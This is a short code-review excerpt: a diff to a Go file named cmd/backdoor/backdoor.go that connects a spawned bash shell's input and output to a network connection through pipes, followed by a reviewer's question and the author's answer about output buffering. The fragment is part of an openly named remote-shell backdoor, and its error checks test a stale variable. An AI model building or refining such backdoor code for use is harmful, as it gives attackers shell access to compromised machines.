cmd/backdoor/backdoor.go

```diff
@@ -62,9 +63,23 @@ func main() {
 				"TERM=xterm-256color",
 				"SHELL=/bin/bash",
 			}
-			cmd.Stdin = conn
-			cmd.Stdout = conn
-			cmd.Stderr = conn
+
+			stdin, _ := cmd.StdinPipe()
+			if err != nil {
+				conn.Write([]byte(fmt.Sprintf("Failed to create pipe to stdin: %s", err)))
+			}
+			stdout, _ := cmd.StdoutPipe()
+			if err != nil {
+				conn.Write([]byte(fmt.Sprintf("Failed to create pipe to stdout: %s", err)))
+			}
+			stderr, _ := cmd.StderrPipe()
+			if err != nil {
+				conn.Write([]byte(fmt.Sprintf("Failed to create pipe to stderr: %s", err)))
+			}
+
+			go io.Copy(stdin, conn)
+			go io.Copy(conn, stdout)
+			go io.Copy(conn, stderr)
```

Comment:
Why do we need all the pipes and copies? What's the rationale behind this?

Reply:
I found that by copying the contents from the pipes asynchronously the buffer is flushed immediately, instead of it waiting for an additional three characters.